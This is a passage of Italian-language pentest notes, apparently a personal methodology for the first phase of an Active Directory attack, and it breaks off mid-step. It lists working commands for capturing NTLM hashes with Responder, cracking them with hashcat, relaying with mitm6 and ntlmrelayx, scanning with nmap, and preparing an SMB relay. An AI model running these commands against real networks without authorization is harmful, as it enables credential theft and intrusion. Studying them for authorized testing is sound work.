Indice dei contenuti


FASE 1 - RECONNAISSANCE / ENUMERATION

Primi passi - Inicial Access

  1. Eseguo Responder, lasciando attivo affinché rimanga in ascolto del traffico, al fine di intercettare qualche hash
sudo responder -I <INTERFACE> -dwv

Se intercetto un hash, posso tentare di crackarlo con hashcat

hashcat -m 5600 <hashes.txt> <WORDLIST.txt>
  1. Per lo stesso scopo, tento un attacco mitm6 per massimo 10 minuti, eseguendo in due schede diverse
impacket-ntlmrelayx -6 -t ldaps://<IP> -wh fakewpad.<DOMAIN.local> -l <NOME_CARTELLA>
sudo mitm6 -d <DOMAIN.local>
  1. Eseguo una scansione con nmap per identificare, dominio, porte, servizi ed eventuali vulnerabilità
nmap -T4 -p- -sC -sV -Pn <IP>
  1. Se dalla scansione emerge la vulnerabilità di smb “signed required but not enabled", possiamo effettuare un smb relay attack. Mettiamo in off le voci smb e http in /etc/responder/Responder.conf, creiamo un file TARGETS.txt con gli indirizzi IP delle macchine vulnerabili e poi eseguiamo in due schede diverse: